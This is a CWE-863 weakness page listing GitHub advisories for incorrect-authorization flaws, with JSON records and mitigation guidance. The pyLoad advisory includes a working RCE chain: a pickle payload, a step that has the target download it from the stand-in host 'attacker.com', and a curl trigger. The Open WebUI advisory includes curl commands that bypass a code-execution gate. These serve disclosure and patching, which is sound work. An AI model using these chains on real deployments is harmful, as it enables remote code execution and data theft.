Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5562 vulnerabilities reference this CWE, most recent first.

GHSA-46VV-MMQM-CFV8

Vulnerability from github – Published: 2022-05-24 19:11 – Updated: 2022-07-13 00:01
VLAI
Details

Certain NetModule devices allow credentials via GET parameters to CLI-PHP. These models with firmware before 4.3.0.113, 4.4.0.111, and 4.5.0.105 are affected: NB800, NB1600, NB1601, NB1800, NB1810, NB2700, NB2710, NB2800, NB2810, NB3700, NB3701, NB3710, NB3711, NB3720, and NB3800.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-39291"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-532",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-23T05:15:00Z",
    "severity": "HIGH"
  },
  "details": "Certain NetModule devices allow credentials via GET parameters to CLI-PHP. These models with firmware before 4.3.0.113, 4.4.0.111, and 4.5.0.105 are affected: NB800, NB1600, NB1601, NB1800, NB1810, NB2700, NB2710, NB2800, NB2810, NB3700, NB3701, NB3710, NB3711, NB3720, and NB3800.",
  "id": "GHSA-46vv-mmqm-cfv8",
  "modified": "2022-07-13T00:01:37Z",
  "published": "2022-05-24T19:11:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39291"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/fulldisclosure/2021/Aug/22"
    },
    {
      "type": "WEB",
      "url": "https://www.netmodule.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4744-96P5-MP2J

Vulnerability from github – Published: 2026-04-04 06:43 – Updated: 2026-04-07 20:00
VLAI
Summary
pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509)
Details

Summary

The fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an ADMIN_ONLY_OPTIONS set to block non-admin users from modifying security-critical config options. The storage_folder option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie.

Required Privileges

The chain requires a single non-admin user with both SETTINGS (to change storage_folder) and ADD (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization.

Root Cause

storage_folder at src/pyload/core/api/__init__.py:238-246 has a path check that blocks writing inside PKGDIR or userdir using os.path.realpath. However, Flask's filesystem session directory (/tmp/pyLoad/flask/ in the standard Docker deployment) is outside both restricted paths.

pyload configures Flask with SESSION_TYPE = "filesystem" at __init__.py:127. The cachelib FileSystemCache stores session files as md5("session:" + session_id) and deserializes them with pickle.load() on every request that carries the corresponding session cookie.

Proven RCE Chain

Tested against lscr.io/linuxserver/pyload-ng:latest Docker image.

Step 1 — Change download directory to Flask session store:

POST /api/set_config_value
{"section":"core","category":"general","option":"storage_folder","value":"/tmp/pyLoad/flask"}

The path check resolves /tmp/pyLoad/flask/ via realpath. It does not start with PKGDIR (/lsiopy/.../pyload/) or userdir (/config/). Check passes.

Step 2 — Compute the target session filename:

md5("session:ATTACKER_SESSION_ID") = 92912f771df217fb6fbfded6705dd47c

Flask-Session uses cachelib which stores files as md5(key_prefix + session_id). The default key prefix is session:.

Step 3 — Host and download the malicious pickle payload:

import pickle, os, struct
class RCE:
    def __reduce__(self):
        return (os.system, ("id > /tmp/pyload-rce-success",))
session = {"_permanent": True, "rce": RCE()}
payload = struct.pack("I", 0) + pickle.dumps(session, protocol=2)
# struct.pack("I", 0) = cachelib timeout header (0 = never expires)

Serve as http://attacker.com/92912f771df217fb6fbfded6705dd47c and submit:

POST /api/add_package
{"name":"x","links":["http://attacker.com/92912f771df217fb6fbfded6705dd47c"],"dest":1}

The file is saved to /tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c.

Step 4 — Trigger deserialization (unauthenticated):

curl http://target:8000/ -b "pyload_session_8000=ATTACKER_SESSION_ID"

The session cookie name is pyload_session_ + the configured port number (__init__.py:128).

Flask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls pickle.load(). The RCE gadget executes.

Result:

$ docker exec pyload-poc cat /tmp/pyload-rce-success
uid=1000(abc) gid=1000(users) groups=1000(users)

Impact

A non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. The attacker can:

  • Execute arbitrary commands with the privileges of the pyload process
  • Read environment variables (API keys, credentials)
  • Access the filesystem (download history, user database)
  • Pivot to other network resources

Suggested Fix

Add storage_folder to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory):

ADMIN_ONLY_OPTIONS = {
    ...
    ("general", "storage_folder"),  # ADDED: prevents session poisoning RCE
    ...
}

Also correct the existing wrong option names:

("webui", "ssl_certfile"),  # FIXED: was "ssl_cert" (dead code)
("webui", "ssl_keyfile"),   # FIXED: was "ssl_key" (dead code)
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.5.0b3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35464"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-04T06:43:37Z",
    "nvd_published_at": "2026-04-07T15:17:44Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an `ADMIN_ONLY_OPTIONS` set to block non-admin users from modifying security-critical config options. The `storage_folder` option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie.\n\n## Required Privileges\n\nThe chain requires a single non-admin user with both `SETTINGS` (to change `storage_folder`) and `ADD` (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization.\n\n## Root Cause\n\n`storage_folder` at `src/pyload/core/api/__init__.py:238-246` has a path check that blocks writing inside PKGDIR or userdir using `os.path.realpath`. However, Flask\u0027s filesystem session directory (`/tmp/pyLoad/flask/` in the standard Docker deployment) is outside both restricted paths.\n\npyload configures Flask with `SESSION_TYPE = \"filesystem\"` at `__init__.py:127`. The cachelib `FileSystemCache` stores session files as `md5(\"session:\" + session_id)` and deserializes them with `pickle.load()` on every request that carries the corresponding session cookie.\n\n## Proven RCE Chain\n\nTested against `lscr.io/linuxserver/pyload-ng:latest` Docker image.\n\n**Step 1** \u2014 Change download directory to Flask session store:\n\n    POST /api/set_config_value\n    {\"section\":\"core\",\"category\":\"general\",\"option\":\"storage_folder\",\"value\":\"/tmp/pyLoad/flask\"}\n\nThe path check resolves `/tmp/pyLoad/flask/` via `realpath`. It does not start with PKGDIR (`/lsiopy/.../pyload/`) or userdir (`/config/`). Check passes.\n\n**Step 2** \u2014 Compute the target session filename:\n\n    md5(\"session:ATTACKER_SESSION_ID\") = 92912f771df217fb6fbfded6705dd47c\n\nFlask-Session uses cachelib which stores files as `md5(key_prefix + session_id)`. The default key prefix is `session:`.\n\n**Step 3** \u2014 Host and download the malicious pickle payload:\n\n    import pickle, os, struct\n    class RCE:\n        def __reduce__(self):\n            return (os.system, (\"id \u003e /tmp/pyload-rce-success\",))\n    session = {\"_permanent\": True, \"rce\": RCE()}\n    payload = struct.pack(\"I\", 0) + pickle.dumps(session, protocol=2)\n    # struct.pack(\"I\", 0) = cachelib timeout header (0 = never expires)\n\nServe as `http://attacker.com/92912f771df217fb6fbfded6705dd47c` and submit:\n\n    POST /api/add_package\n    {\"name\":\"x\",\"links\":[\"http://attacker.com/92912f771df217fb6fbfded6705dd47c\"],\"dest\":1}\n\nThe file is saved to `/tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c`.\n\n**Step 4** \u2014 Trigger deserialization (unauthenticated):\n\n    curl http://target:8000/ -b \"pyload_session_8000=ATTACKER_SESSION_ID\"\n\nThe session cookie name is `pyload_session_` + the configured port number (`__init__.py:128`).\n\nFlask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls `pickle.load()`. The RCE gadget executes.\n\n**Result**:\n\n    $ docker exec pyload-poc cat /tmp/pyload-rce-success\n    uid=1000(abc) gid=1000(users) groups=1000(users)\n\n## Impact\n\nA non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. The attacker can:\n\n- Execute arbitrary commands with the privileges of the pyload process\n- Read environment variables (API keys, credentials)\n- Access the filesystem (download history, user database)\n- Pivot to other network resources\n\n## Suggested Fix\n\nAdd `storage_folder` to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory):\n\n    ADMIN_ONLY_OPTIONS = {\n        ...\n        (\"general\", \"storage_folder\"),  # ADDED: prevents session poisoning RCE\n        ...\n    }\n\nAlso correct the existing wrong option names:\n\n    (\"webui\", \"ssl_certfile\"),  # FIXED: was \"ssl_cert\" (dead code)\n    (\"webui\", \"ssl_keyfile\"),   # FIXED: was \"ssl_key\" (dead code)",
  "id": "GHSA-4744-96p5-mp2j",
  "modified": "2026-04-07T20:00:04Z",
  "published": "2026-04-04T06:43:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33509"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35464"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-33509"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509)"
}

GHSA-4754-5J9C-773M

Vulnerability from github – Published: 2022-05-13 01:21 – Updated: 2022-05-13 01:21
VLAI
Details

In checkGrantUriPermissionLocked of ActivityManagerService.java, there is a possible permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android-9.0 Android ID: A-111934948

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-9492"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-02T19:29:00Z",
    "severity": "HIGH"
  },
  "details": "In checkGrantUriPermissionLocked of ActivityManagerService.java, there is a possible permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android-9.0 Android ID: A-111934948",
  "id": "GHSA-4754-5j9c-773m",
  "modified": "2022-05-13T01:21:07Z",
  "published": "2022-05-13T01:21:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9492"
    },
    {
      "type": "WEB",
      "url": "https://android.googlesource.com/platform/frameworks/base/+/962fb40991f15be4f688d960aa00073683ebdd20"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2018-10-01,"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/105484"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-475V-6WXG-C2RX

Vulnerability from github – Published: 2022-05-13 01:50 – Updated: 2022-05-13 01:50
VLAI
Details

In Webgalamb through 7.0, system/ajax.php functionality is supposed to be available only to the administrator. However, by using one of the bgsend, atment_sddd1xGz, or xls_bgimport query parameters, most of these methods become available to unauthenticated users.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-19515"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-21T16:00:00Z",
    "severity": "CRITICAL"
  },
  "details": "In Webgalamb through 7.0, system/ajax.php functionality is supposed to be available only to the administrator. However, by using one of the bgsend, atment_sddd1xGz, or xls_bgimport query parameters, most of these methods become available to unauthenticated users.",
  "id": "GHSA-475v-6wxg-c2rx",
  "modified": "2022-05-13T01:50:52Z",
  "published": "2022-05-13T01:50:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19515"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/fulldisclosure/2019/Jan/15"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/151017/Webgalamb-Information-Disclosure-XSS-CSRF-SQL-Injection.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4782-6X7J-Q79Q

Vulnerability from github – Published: 2022-05-13 01:14 – Updated: 2022-05-13 01:14
VLAI
Details

An incorrect permission check in the admin backend in gvfs before version 1.39.4 was found that allows reading and modify arbitrary files by privileged users without asking for password when no authentication agent is running. This vulnerability can be exploited by malicious programs running under privileges of users belonging to the wheel group to further escalate its privileges by modifying system files without user's knowledge. Successful exploitation requires uncommon system configuration.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-3827"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-25T18:29:00Z",
    "severity": "HIGH"
  },
  "details": "An incorrect permission check in the admin backend in gvfs before version 1.39.4 was found that allows reading and modify arbitrary files by privileged users without asking for password when no authentication agent is running. This vulnerability can be exploited by malicious programs running under privileges of users belonging to the wheel group to further escalate its privileges by modifying system files without user\u0027s knowledge. Successful exploitation requires uncommon system configuration.",
  "id": "GHSA-4782-6x7j-q79q",
  "modified": "2022-05-13T01:14:27Z",
  "published": "2022-05-13T01:14:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3827"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:1517"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:2145"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3827"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.gnome.org/GNOME/gvfs/merge_requests/31"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-47C7-QRM7-MQW7

Vulnerability from github – Published: 2026-07-06 20:16 – Updated: 2026-07-06 20:16
VLAI
Summary
id: groups= computed from real GID instead of effective GID
Details

The id utility in uutils coreutils miscalculates the groups= section of its output. The implementation uses a user's real GID instead of their effective GID to compute the group list, leading to potentially divergent output compared to GNU coreutils. Because many scripts and automated processes rely on the output of id to make security-critical access-control or permission decisions, this discrepancy can lead to unauthorized access or security misconfigurations.


Zellic finding 3.72. Reported in the Zellic uutils coreutils Program Security Assessment (for Canonical, Jan 2026), audited commit 3a07ffc5a9bd4c283e75afa548ba1f1957bad242.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "uu_id"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-273",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-06T20:16:46Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "The id utility in uutils coreutils miscalculates the groups= section of its output. The implementation uses a user\u0027s real GID instead of their effective GID to compute the group list, leading to potentially divergent output compared to GNU coreutils. Because many scripts and automated processes rely on the output of id to make security-critical access-control or permission decisions, this discrepancy can lead to unauthorized access or security misconfigurations.\n\n---\n_Zellic finding 3.72. Reported in the Zellic *uutils coreutils Program Security Assessment* (for Canonical, Jan 2026), audited commit `3a07ffc5a9bd4c283e75afa548ba1f1957bad242`._",
  "id": "GHSA-47c7-qrm7-mqw7",
  "modified": "2026-07-06T20:16:46Z",
  "published": "2026-07-06T20:16:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/uutils/coreutils/security/advisories/GHSA-47c7-qrm7-mqw7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35370"
    },
    {
      "type": "WEB",
      "url": "https://github.com/uutils/coreutils/issues/10006"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/uutils/coreutils"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "id: groups= computed from real GID instead of effective GID"
}

GHSA-47WC-GH7X-58G7

Vulnerability from github – Published: 2024-06-12 09:30 – Updated: 2024-06-12 09:30
VLAI
Details

Dell Client Platform contains an incorrect authorization vulnerability. An attacker with physical access to the system could potentially exploit this vulnerability by bypassing BIOS authorization to modify settings in the BIOS.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0160"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-12T07:15:50Z",
    "severity": "MODERATE"
  },
  "details": "Dell Client Platform contains an incorrect authorization vulnerability. An attacker with physical access to the system could potentially exploit this vulnerability by bypassing BIOS authorization to modify settings in the BIOS.",
  "id": "GHSA-47wc-gh7x-58g7",
  "modified": "2024-06-12T09:30:47Z",
  "published": "2024-06-12T09:30:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0160"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000224763/dsa-2024-122"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-482G-PF4J-CWFC

Vulnerability from github – Published: 2022-05-26 00:01 – Updated: 2022-06-10 00:00
VLAI
Details

TrueStack Direct Connect 1.4.7 has Incorrect Access Control.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-23775"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-25T16:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "TrueStack Direct Connect 1.4.7 has Incorrect Access Control.",
  "id": "GHSA-482g-pf4j-cwfc",
  "modified": "2022-06-10T00:00:49Z",
  "published": "2022-05-26T00:01:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23775"
    },
    {
      "type": "WEB",
      "url": "https://truestack.com/support"
    },
    {
      "type": "WEB",
      "url": "https://truestack.com/ufaqs/cve-2022-23775-vulnerability-upgrade-to-1-4-10-or-higher-to-fix"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-482J-2PQ6-Q5W4

Vulnerability from github – Published: 2026-05-14 20:28 – Updated: 2026-05-15 23:55
VLAI
Summary
Open WebUI: Jupyter code execution works despite `ENABLE_CODE_EXECUTION=false` — feature gate bypassed
Details

Summary

The /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLE_CODE_EXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes.

Details

The admin configuration correctly shows ENABLE_CODE_EXECUTION: false. However, the code execution endpoint does not check this flag before forwarding Python code to the Jupyter server. Any authenticated user can execute arbitrary code in the Jupyter container.

PoC

Verified against Open WebUI v0.8.11 (latest) Docker on 2026-03-25.

Setup: Jupyter server connected, ENABLE_CODE_EXECUTION=false confirmed in admin config.

# Step 1: Verify code execution is disabled
curl -s http://target:8080/api/v1/configs/code_execution \
  -H "Authorization: Bearer $TOKEN"
# Returns: {"ENABLE_CODE_EXECUTION": false, ...}

# Step 2: Execute code anyway — gate bypassed
curl -s -X POST http://target:8080/api/v1/utils/code/execute \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"code":"import os; print(os.popen(\"id\").read())"}'

Verified output:

Config: {"ENABLE_CODE_EXECUTION":false,"CODE_EXECUTION_ENGINE":"jupyter",...}

execute_status=200
execute_body={"stdout":"OPEN-WEBUI-SSRF-SECRET","stderr":"","result":""}

The PoC read the internal secret service content via Jupyter — despite ENABLE_CODE_EXECUTION=false. The Jupyter container has network access to internal services, making this both a code execution bypass and an SSRF vector.

Impact

Any authenticated user can execute arbitrary Python code in the Jupyter container, even when the admin has explicitly disabled code execution:

  • Arbitrary code execution in the Jupyter container (read files, spawn processes)
  • Network access to all internal Docker services from the Jupyter container
  • Data exfiltration from internal services
  • The admin's security configuration (ENABLE_CODE_EXECUTION=false) is silently ineffective
  • Users who are told "code execution is disabled" have a false sense of security

Resolution

Fixed in commit 6d736d3c5, first released in v0.8.12. The /api/v1/utils/code/execute handler in backend/open_webui/routers/utils.py now checks request.app.state.config.ENABLE_CODE_EXECUTION before dispatching to the Jupyter engine and returns 403 with FEATURE_DISABLED('Code execution') when the admin has disabled the flag. The retrieval-side code path was gated in the same commit. Users on >= 0.8.12 are not affected.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.11"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45672"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:28:40Z",
    "nvd_published_at": "2026-05-15T21:16:38Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe `/api/v1/utils/code/execute` endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set `ENABLE_CODE_EXECUTION=false`. The feature gate is not enforced on the API endpoint \u2014 the configuration says \"disabled\" but code still executes.\n\n### Details\n\nThe admin configuration correctly shows `ENABLE_CODE_EXECUTION: false`. However, the code execution endpoint does not check this flag before forwarding Python code to the Jupyter server. Any authenticated user can execute arbitrary code in the Jupyter container.\n\n### PoC\n\n**Verified against Open WebUI v0.8.11 (latest) Docker on 2026-03-25.**\n\n**Setup:** Jupyter server connected, `ENABLE_CODE_EXECUTION=false` confirmed in admin config.\n\n```bash\n# Step 1: Verify code execution is disabled\ncurl -s http://target:8080/api/v1/configs/code_execution \\\n  -H \"Authorization: Bearer $TOKEN\"\n# Returns: {\"ENABLE_CODE_EXECUTION\": false, ...}\n\n# Step 2: Execute code anyway \u2014 gate bypassed\ncurl -s -X POST http://target:8080/api/v1/utils/code/execute \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"code\":\"import os; print(os.popen(\\\"id\\\").read())\"}\u0027\n```\n\n**Verified output:**\n\n```\nConfig: {\"ENABLE_CODE_EXECUTION\":false,\"CODE_EXECUTION_ENGINE\":\"jupyter\",...}\n\nexecute_status=200\nexecute_body={\"stdout\":\"OPEN-WEBUI-SSRF-SECRET\",\"stderr\":\"\",\"result\":\"\"}\n```\n\nThe PoC read the internal secret service content via Jupyter \u2014 despite `ENABLE_CODE_EXECUTION=false`. The Jupyter container has network access to internal services, making this both a code execution bypass and an SSRF vector.\n\n### Impact\n\nAny authenticated user can execute arbitrary Python code in the Jupyter container, even when the admin has explicitly disabled code execution:\n\n- Arbitrary code execution in the Jupyter container (read files, spawn processes)\n- Network access to all internal Docker services from the Jupyter container\n- Data exfiltration from internal services\n- The admin\u0027s security configuration (`ENABLE_CODE_EXECUTION=false`) is silently ineffective\n- Users who are told \"code execution is disabled\" have a false sense of security\n\n## Resolution\n\nFixed in commit [6d736d3c5](https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba), first released in **v0.8.12**. The `/api/v1/utils/code/execute` handler in `backend/open_webui/routers/utils.py` now checks `request.app.state.config.ENABLE_CODE_EXECUTION` before dispatching to the Jupyter engine and returns 403 with `FEATURE_DISABLED(\u0027Code execution\u0027)` when the admin has disabled the flag. The retrieval-side code path was gated in the same commit. Users on `\u003e= 0.8.12` are not affected.",
  "id": "GHSA-482j-2pq6-q5w4",
  "modified": "2026-05-15T23:55:51Z",
  "published": "2026-05-14T20:28:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-482j-2pq6-q5w4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45672"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/commit/6d736d3c598dbe49488675ed42845e00b62dfcba"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.8.12"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI: Jupyter code execution works despite `ENABLE_CODE_EXECUTION=false` \u2014 feature gate bypassed"
}

GHSA-4844-25M4-J7HC

Vulnerability from github – Published: 2026-07-08 21:30 – Updated: 2026-07-08 21:30
VLAI
Details

Incorrect Authorization vulnerability in Progress MOVEit Transfer (Audit User module).

This issue affects MOVEit Transfer: before 2025.0.7, from 2025.1.0 before 2025.1.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8800"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-08T20:17:00Z",
    "severity": "LOW"
  },
  "details": "Incorrect Authorization vulnerability in Progress MOVEit Transfer (Audit User module).\n\nThis issue affects MOVEit Transfer: before 2025.0.7, from 2025.1.0 before 2025.1.3.",
  "id": "GHSA-4844-25m4-j7hc",
  "modified": "2026-07-08T21:30:30Z",
  "published": "2026-07-08T21:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8800"
    },
    {
      "type": "WEB",
      "url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2026/page/Fixed-Issues-in-2026.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
